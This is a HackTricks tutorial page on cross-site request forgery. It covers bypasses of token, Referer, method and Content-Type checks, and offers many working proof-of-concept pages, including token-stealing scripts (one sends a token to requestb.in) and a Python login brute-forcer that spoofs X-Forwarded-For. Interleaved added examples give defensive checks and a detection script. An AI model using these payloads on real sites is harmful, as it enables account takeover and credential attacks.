# CSRF (Cross Site Request Forgery)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Join the [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up to date with the fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed about the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## Explaining Cross-Site Request Forgery (CSRF)

**Cross-Site Request Forgery (CSRF)** is a type of security vulnerability found in web applications. It enables attackers to perform actions on behalf of unsuspecting users by exploiting their authenticated sessions. The attack is executed when a user who is logged into the victim platform visits a malicious site. That site then triggers requests to the victim's account through means such as executing JavaScript, submitting forms, or fetching images.

### Prerequisites for a CSRF Attack

To exploit a CSRF vulnerability, several conditions must be met:

1. **Identify a Valuable Action**: The attacker needs to find an action worth exploiting, such as changing the user's password or email, or elevating privileges.
2. **Session Management**: The user's session must be managed solely through cookies or the HTTP Basic Authentication header, as other headers cannot be manipulated for this purpose.
3. **Absence of Unpredictable Parameters**: The request must not contain unpredictable parameters, as they can prevent the attack.

### Quick Check

You can **capture the request in Burp** and check the CSRF protections, and to test from the browser you can click on **Copy as fetch** and check the request:

<figure><img src="../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>

### Defending Against CSRF

Several countermeasures can be implemented to protect against CSRF attacks:

* [**SameSite cookies**](hacking-with-cookies/#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/#samesite).
* [**Cross-origin resource sharing**](cors-bypass.md): The CORS policy of the victim site can influence the feasibility of the attack, especially if the attack requires reading the response from the victim site. [Learn about CORS bypass](cors-bypass.md).
* **User Verification**: Prompting for the user's password or solving a captcha can confirm the user's intent.
* **Checking Referrer or Origin Headers**: Validating these headers can help ensure requests come from trusted sources. However, carefully crafted URLs can bypass poorly implemented checks, such as:
  * Using `http://mal.net?orig=http://example.com` (URL ends with the trusted URL)
  * Using `http://example.com.mal.net` (URL starts with the trusted URL)
* **Modifying Parameter Names**: Altering the names of parameters in POST or GET requests can help in preventing automated attacks.
* **CSRF Tokens**: Incorporating a unique CSRF token in each session and requiring this token in subsequent requests can significantly mitigate the risk of CSRF. The effectiveness of the token can be enhanced by enforcing CORS.

Understanding and implementing these defenses is crucial for maintaining the security and integrity of web applications.

## Defences Bypass

### From POST to GET

Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token**, but you should **check** whether a **GET** is also **valid** and whether, when you send a GET request, the **CSRF token is still being validated**.

### Lack of token

Applications might implement a mechanism to **validate tokens** when they are present. However, a vulnerability arises if validation is skipped altogether when the token is absent. Attackers can exploit this by **removing the parameter** that carries the token, not just its value. This allows them to circumvent the validation process and conduct a Cross-Site Request Forgery (CSRF) attack effectively.

### CSRF token is not tied to the user session

Applications that **do not tie CSRF tokens to user sessions** present a significant **security risk**. These systems verify tokens against a **global pool** rather than ensuring each token is bound to the session that initiated it.

Here is how attackers exploit this:

1. **Authenticate** using their own account.
2. **Obtain a valid CSRF token** from the global pool.
3. **Use this token** in a CSRF attack against a victim.

This vulnerability allows attackers to make unauthorized requests on behalf of the victim, exploiting the application's **inadequate token validation mechanism**.

### Method bypass

If the request is using a "**weird**" **method**, check whether the **method override functionality** is working. For example, if it is **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_

This could also work by sending the **\_method parameter inside a POST request** or by using the **headers**:

* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_

### Custom header token bypass

If the request adds a **custom header** with a **token** as the **CSRF protection method**, then:

* Test the request without the **customized token and also without the header.**
* Test the request with a token of the exact **same length but a different value**.

### CSRF token is verified by a cookie

Applications may implement CSRF protection by duplicating the token in both a cookie and a request parameter, or by setting a CSRF cookie and verifying that the token sent to the backend corresponds to the cookie. The application validates requests by checking whether the token in the request parameter matches the value in the cookie.

However, this method is vulnerable to CSRF attacks if the website has flaws that allow an attacker to set a CSRF cookie in the victim's browser, such as a CRLF injection. The attacker can exploit this by loading a deceptive image that sets the cookie, followed by initiating the CSRF attack.

Below is an example of how an attack could be structured:

```html
<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>
```
{% hint style="info" %}
Note that if the **CSRF token is tied to the session cookie this attack won't work**, because you would need to set the victim's session as well, and therefore you would be attacking yourself.
{% endhint %}
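The three token weaknesses above (validation skipped when the parameter is missing, tokens checked against a global pool instead of the issuing session, and a double-submit cookie that anyone able to plant a cookie can satisfy) share one fix: derive the token from the session under a server-side secret and verify it on every state-changing request. The following is an added example and not HackTricks code; the secret, the session ids and the `change_email` handler are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret. A deployment keeps this out of source control;
# without it, an attacker who can set cookies in the victim's browser still
# cannot mint a token that verifies.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"


def _mac(session_id, nonce):
    """HMAC-SHA256 over session id and nonce, hex encoded."""
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token = nonce.HMAC(secret, session_id:nonce); embed it in the form."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id, submitted):
    """True only for a well-formed token minted for this exact session.

    A missing or empty token is a failure, never a reason to skip the check,
    which closes the "lack of token" bypass. Recomputing the MAC with the
    caller's session id closes the "token not tied to the session" bypass:
    a token obtained in the attacker's own session fails for the victim.
    """
    if not submitted:
        return False
    nonce, sep, mac = submitted.partition(".")
    if not sep or not nonce or not mac:
        return False
    return hmac.compare_digest(_mac(session_id, nonce), mac)


def change_email(session_id, form):
    """Constructed handler: form is the parsed POST body, which may lack 'csrf'."""
    if not verify_csrf_token(session_id, form.get("csrf")):
        return 403, "CSRF token missing or invalid"
    return 200, f"email changed to {form['email']}"
```

Because the server recomputes the MAC from its own view of the session, neither a token taken from another account nor a cookie planted through CRLF injection can satisfy the check; the only way to obtain a valid token is to read it out of a page served inside the victim's session, which is the XSS and dangling-markup scenario covered later on this page.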
### Content-Type change

According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), in order to **avoid preflight** requests using the **POST** method these are the allowed Content-Type values:

- **`application/x-www-form-urlencoded`**
- **`multipart/form-data`**
- **`text/plain`**

However, note that the **server's logic may vary** depending on the **Content-Type** used, so you should try the values mentioned and others such as **`application/json`**, **`text/xml`**, **`application/xml`**.

Example (from [here](https://brycec.me/posts/corctf\_2021\_challenges)) of sending JSON data as text/plain:

```html
<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>
```
### Bypassing Preflight Requests for JSON Data

When attempting to send JSON data via a POST request, using `Content-Type: application/json` in an HTML form is not directly possible. Similarly, using `XMLHttpRequest` to send this content type triggers a preflight request. Nonetheless, there are strategies to potentially bypass this limitation and check whether the server processes the JSON data irrespective of the Content-Type:

1. **Use Alternative Content Types**: Employ `Content-Type: text/plain` or `Content-Type: application/x-www-form-urlencoded` by setting `enctype="text/plain"` in the form. This tests whether the backend uses the data regardless of the Content-Type.
2. **Modify Content Type**: To avoid a preflight request while still having the server recognize the content as JSON, you can send the data with `Content-Type: text/plain; application/json`. This does not trigger a preflight request but might be processed correctly by the server if it is configured to accept `application/json`.
3. **SWF Flash File Utilization**: A less common but feasible method involves using an SWF flash file to bypass such restrictions. For an in-depth understanding of this technique, refer to [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).
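The point of this section and the previous one is that a server which parses JSON regardless of the declared Content-Type will accept the `text/plain` form body shown above. The following added example (not HackTricks code) compares, in Python, a lenient parser with a strict one that checks the media type, with parameters stripped so that `text/plain; application/json` is still `text/plain`, before touching the body. The sample body is constructed here from the `enctype="text/plain"` form above, encoded the way the browser would send it.

```python
import json

# Constructed: what the browser sends for the text/plain form above, that is
# name "=" value followed by CRLF. It happens to be valid JSON.
TEXT_PLAIN_FORM_BODY = (
    '{"garbageeeee":"=", "yep": "yep yep yep", "url": "https://webhook/"}\r\n'
)


def media_type(content_type):
    """Lower-cased type/subtype with any parameters (charset, junk) removed."""
    if not content_type:
        return ""
    return content_type.split(";", 1)[0].strip().lower()


def lenient_parse(headers, raw_body):
    """The weak behaviour the bypass relies on: parse JSON whatever the header says.

    `headers` is accepted only so both parsers share a signature; it is ignored.
    """
    try:
        return 200, json.loads(raw_body)
    except ValueError:
        return 400, None


def strict_parse(headers, raw_body):
    """Accept a body as JSON only when the request declares application/json.

    A cross-site HTML form cannot send that media type, and a cross-origin
    fetch or XMLHttpRequest that sets it triggers a CORS preflight, so the
    check holds as long as the CORS policy does not approve the request.
    """
    if media_type(headers.get("Content-Type")) != "application/json":
        return 415, None
    try:
        return 200, json.loads(raw_body)
    except ValueError:
        return 400, None
```

The strict parser returns 415 (Unsupported Media Type) for all three forms the page suggests testing (`text/plain`, `application/x-www-form-urlencoded` and `text/plain; application/json`) and for a missing header, while still accepting `Application/JSON; charset=utf-8` because only the type/subtype is compared.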

### Referrer / Origin check bypass

**Avoid Referrer header**

Applications may validate the 'Referer' header only when it is present. To prevent the browser from sending this header, the following HTML meta tag can be used:

```html
<meta name="referrer" content="never">
```
This ensures the 'Referer' header is omitted, potentially bypassing validation checks in some applications.

**Regexp bypasses**

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

To place the domain name of the server inside the URL that the Referrer is going to send, as part of the parameters, you can do:

```html
<html>
<!-- Referrer policy needed to send the query parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>
```
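The substring matches listed under "Checking Referrer or Origin Headers" earlier on this page and the Referer bypasses in this section (suppressing the header, hiding the trusted domain in the query string of the referring page, and a host such as `example.com.mal.net`) all defeat a check that looks for the trusted domain *somewhere* in the header value. The following is an added example, not HackTricks code: a Python check that parses the Origin or Referer, compares scheme, host and port exactly against an allow-list (a constructed one here) and fails closed when neither header is present, shown beside the naive check it replaces.

```python
from urllib.parse import urlsplit

# Constructed allow-list of the application's own origins as (scheme, host, port).
# A real deployment would load this from configuration.
TRUSTED_ORIGINS = {("https", "example.com", 443)}


def naive_referer_check(referer):
    """The weak check the bypasses above target: a substring match."""
    return referer is not None and "example.com" in referer


def origin_of(url):
    """Return (scheme, host, port) for an absolute URL, or None otherwise.

    Only the authority part is compared, so a trusted domain placed in the
    query string or used as a prefix of a longer host name does not match.
    """
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:  # non-numeric port in the header value
        return None
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    return (parts.scheme.lower(), parts.hostname.lower(), port)


def is_trusted_source(headers):
    """Strict source check for a state-changing request.

    `headers` is a dict with canonical header names (assumed normalised by
    the framework). Origin is preferred, Referer is the fallback, and the
    request is rejected when neither is present or when Origin is the opaque
    value "null": a page that suppresses the Referer with
    <meta name="referrer" content="never"> must not pass the check.
    """
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return False
    parsed = origin_of(value)
    return parsed is not None and parsed in TRUSTED_ORIGINS
```

The naive check accepts both crafted URLs from the defenses list; the strict one rejects them, rejects a Referer that carries the trusted domain in its query string as in the PoC above, and rejects a scheme or port mismatch (`http://example.com/` against an `https` allow-list). Failing closed on a missing header is the part most implementations get wrong, and it is what makes the `referrer: never` bypass work.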
### **HEAD method bypass**

The first part of [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) explains that, in [Oak's source code](https://github.com/oakserver/oak/blob/main/router.ts#L281), the router is set to handle **HEAD requests as GET requests** with no response body, a common workaround that is not unique to Oak. Instead of a specific handler that deals with HEAD requests, they are simply **given to the GET handler and the application just removes the response body**.

Therefore, if a GET request is being limited, you could just **send a HEAD request that will be processed as a GET request**.
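The method-override bypass earlier on this page and the HEAD bypass here both exploit a server that decides *which* method a request has in one place and applies its CSRF rules in another: a `_method` parameter or an override header turns a POST into a PUT after the check has run, and a HEAD is quietly handed to the GET handler. The following added example (not HackTricks code or Oak's) is a small Python dispatcher with a constructed route table and handler names. It resolves the effective method first, applies the CSRF decision to that method, and refuses to let any safe method, HEAD included, reach a handler registered as state-changing.

```python
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# The override sources listed on this page; honoured only on a real POST,
# which is how most frameworks implement method override.
OVERRIDE_HEADERS = ("X-HTTP-Method", "X-HTTP-Method-Override", "X-Method-Override")

# Constructed route table: (path, method) -> (handler name, changes server state).
# The /legacy route deliberately registers a state change on GET to show it is refused.
ROUTES = {
    ("/account/email", "GET"): ("show_email_form", False),
    ("/account/email", "POST"): ("change_email", True),
    ("/account/email", "PUT"): ("change_email", True),
    ("/legacy/change-email", "GET"): ("change_email", True),
}


def effective_method(method, headers, query, form):
    """Return the method the application will act on after overrides."""
    method = method.upper()
    if method != "POST":
        return method
    for name in OVERRIDE_HEADERS:
        if name in headers:
            return headers[name].upper()
    override = form.get("_method") or query.get("_method")
    return override.upper() if override else method


def route(path, method, headers, query, form, csrf_token_valid):
    """Dispatch a request; returns (status, handler name or reason).

    `csrf_token_valid` is the outcome of whatever token check the application
    performs; it is consulted only once the effective method is known, so an
    override to PUT or DELETE cannot slip past a check that ran on "POST".
    """
    eff = effective_method(method, headers, query, form)
    lookup = "GET" if eff == "HEAD" else eff  # HEAD served by the GET handler, as in Oak
    entry = ROUTES.get((path, lookup))
    if entry is None:
        return 405, "method not allowed"
    handler, changes_state = entry
    if changes_state:
        if eff in SAFE_METHODS:
            return 405, f"{handler} must not run on {eff}"
        if not csrf_token_valid:
            return 403, f"CSRF check failed for effective method {eff}"
    return 200, handler
```

Two properties follow from this arrangement: a HEAD still gets the body-less GET behaviour the writeup describes, but only for a read-only handler, and a GET or HEAD to the misconfigured `/legacy/change-email` route is refused outright rather than silently mutating state, which is the "from POST to GET" case at the top of this page.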

## **Exploit Examples**

### **Exfiltrating CSRF Token**

If a **CSRF token** is being used as a **defence**, you could try to **exfiltrate it** by abusing an [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.

### **GET using HTML tags**

```html
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
Other HTML5 tags that can be used to automatically send a GET request are:

```html
<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">
```
### Form GET request

```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

### Form POST request

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>
```
### Form POST request through iframe

```html
<!--
The request is sent through the iframe without reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

### **Ajax POST request**

```html
<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
    xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
    xh=new ActiveXObject("Microsoft.XMLHTTP");
}

xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
    type: "POST",
    url: "https://google.com",
    data: "param=value&param2=value2"
})
</script>
```

### multipart/form-data POST request

```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
// Do not set a Content-Type header here: for a FormData body the browser adds
// "multipart/form-data" with the boundary itself, and an explicit value such as
// application/x-www-form-urlencoded would replace it and break parsing.
fetch("http://example/some/path", {
    method: "post",
    body: myFormData,
    credentials: "include",
    mode: "no-cors"
});
```

### multipart/form-data POST request v2

```javascript
// https://www.exploit-db.com/exploits/20009
// Assumed inputs (placeholders, not part of the original snippet): target URL,
// form field name, file name, the file's Content-Type and its contents.
var url = "http://example/some/path",
    nameVar = "newAttachment",
    fileName = "file.txt",
    ctype = "text/plain",
    fileData = "file contents";
var boundary = "OWNEDBYOFFSEC",
    xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
// MIME POST request (the boundary parameter is separated with ";", not ",").
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary);
// Content-Length is a forbidden request header in browsers; it is computed from the body.
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
// sendAsBinary() was Firefox-only and has been removed; send() accepts the string body.
xhr.send(body);
```
### Form POST request from within an iframe

```html
<!-- expl.html -->
<body onload="envia()">
<form method="POST" id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>
</body>

<!-- public.html -->
<iframe src="expl.html" style="position:absolute;top:-5000px">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```
### **Steal CSRF Token and send a POST request**
```javascript
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);
    xhr.withCredentials = true;

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            //console.log(xhr.responseText);
        }
    }

    xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return it as a HTML document
    xhr.responseType = "document";
    xhr.withCredentials = true;
    // true on the end of here makes the call asynchronous
    xhr.open("GET", GET_URL, true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            var page = xhr.response;
            // Get the input element
            var input = page.getElementById("token");
            // Show the token
            //console.log("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
### **Steal CSRF Token and send a POST request using an iframe, a form and Ajax**

```html
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>
<script type="text/javascript">
function f1(){
    x1=document.getElementById("i1");
    x1d=(x1.contentWindow||x1.contentDocument);
    t=x1d.document.getElementById("token").value;
    document.getElementById("token").value=t;
    document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
```
### **Steal CSRF Token and send a POST request using an iframe and a form**

```html
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
    var name = 'admin2';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php" enctype="multipart/form-data">');
    document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
    document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
    document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
    document.writeln('</form>');
    document.forms[0].submit.click();
}
</script>
```
### **Steal the token and send it using 2 iframes**

```html
<script>
var token;
function readframe1(){
    token = frame1.document.getElementById("profile").token.value;
    document.getElementById("bypass").token.value = token
    loadframe2();
}
function loadframe2(){
    var test = document.getElementById("frame2");
    test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name="bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
```
### **Steal CSRF token with Ajax and send a POST with a form**

```html
<body onload="getData()">
<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>
<script>
var x = new XMLHttpRequest();
function getData() {
    x.withCredentials = true;
    x.open("GET","http://google.com?param=VALUE",true);
    x.send(null);
}
x.onreadystatechange = function() {
    if (x.readyState == XMLHttpRequest.DONE) {
        var token = x.responseText.match(/name="token" value="(.+)"/)[1];
        document.getElementById("findtoken").value = token;
        document.getElementById("form").submit();
    }
}
</script>
```

### CSRF with Socket.IO

```html
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');
const username = 'admin'
socket.on('connect', () => {
    console.log('connected!');
    socket.emit('join', {
        room: username
    });
    socket.emit('my_room_event', {
        data: '!flag',
        room: username
    })
});
</script>
```
## CSRF Login Brute Force

The following code can be used to brute force a login form that uses a CSRF token (it also sets the X-Forwarded-For header to try to bypass a possible IP blacklisting):

```python
import requests
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
    #Return CSRF + Session (cookie)
    r = requests.get(URL)
    csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
    csrf = csrf.group(1)
    session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
    return csrf, session_cookie

def login(user, password):
    print(f"{user}:{password}")
    csrf, cookie = init_session()
    cookies = {SESSION_COOKIE_NAME: cookie}
    data = {
        "tokenCSRF": csrf,
        "username": user,
        "password": password,
        "save": ""
    }
    headers = {
        # Octets are kept within 1-254 so every generated value is a valid IPv4 address
        "X-Forwarded-For": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}"
    }
    r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
    if "Username or password incorrect" in r.text:
        return False
    else:
        print(f"FOUND {user} : {password}")
        return True

with open(PASS_LIST, "r") as f:
    for line in f:
        login(USER, line.strip())
```
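The script above randomises `X-Forwarded-For` precisely because some login throttles key their counters on that header, which any client can set. The following added example (not HackTricks code) is a Python detection pass over constructed access-log lines showing why both a throttle and a detection rule must count failures by the TCP peer address rather than by the forwarded header. The log format (peer address, request line, status, quoted X-Forwarded-For) and the `/admin/` login path are assumptions made for the example.

```python
import re
from collections import Counter

# Constructed sample log lines: one client behind 203.0.113.7 sends six failed
# logins with a different X-Forwarded-For each time; an unrelated client logs in.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Nov/2020:18:22:38 +0000] "POST /admin/ HTTP/1.1" 401 "10.3.44.9"
203.0.113.7 - - [06/Nov/2020:18:22:39 +0000] "POST /admin/ HTTP/1.1" 401 "172.16.8.2"
203.0.113.7 - - [06/Nov/2020:18:22:39 +0000] "POST /admin/ HTTP/1.1" 401 "192.168.77.5"
203.0.113.7 - - [06/Nov/2020:18:22:40 +0000] "POST /admin/ HTTP/1.1" 401 "10.200.1.1"
203.0.113.7 - - [06/Nov/2020:18:22:40 +0000] "POST /admin/ HTTP/1.1" 401 "172.31.9.9"
203.0.113.7 - - [06/Nov/2020:18:22:41 +0000] "POST /admin/ HTTP/1.1" 401 "10.9.9.9"
198.51.100.4 - - [06/Nov/2020:18:23:02 +0000] "GET /admin/ HTTP/1.1" 200 "-"
198.51.100.4 - - [06/Nov/2020:18:23:10 +0000] "POST /admin/ HTTP/1.1" 302 "-"
"""

# Assumed log layout: combined-style prefix, then the status and the quoted
# X-Forwarded-For value as logged by the front-end proxy.
LINE_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<xff>[^"]*)"$'
)

LOGIN_PATH = "/admin/"


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def failed_login_counts(records, key):
    """Count failed login POSTs per value of `key` ('peer' or 'xff')."""
    counts = Counter()
    for r in records:
        if r["method"] == "POST" and r["path"] == LOGIN_PATH and r["status"] == "401":
            counts[r[key]] += 1
    return counts


def flag_sources(log_text, threshold=5):
    """Sources with at least `threshold` failures, keyed both ways for comparison.

    Keyed on the forwarded header, the spoofing client never crosses the
    threshold; keyed on the peer address it is flagged at once.
    """
    records = list(parse_log(log_text))
    return {
        "by_forwarded_for": sorted(
            k for k, n in failed_login_counts(records, "xff").items() if n >= threshold
        ),
        "by_peer": sorted(
            k for k, n in failed_login_counts(records, "peer").items() if n >= threshold
        ),
    }
```

The same rule applies to the throttle itself: `X-Forwarded-For` is only meaningful for hops added by your own trusted proxies, so a rate limiter should take the right-most address appended by a proxy it controls, or the socket peer when there is none, and never the left-most value the client supplied.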
## Tools <a href="#tools" id="tools"></a>

* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)

## References

* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)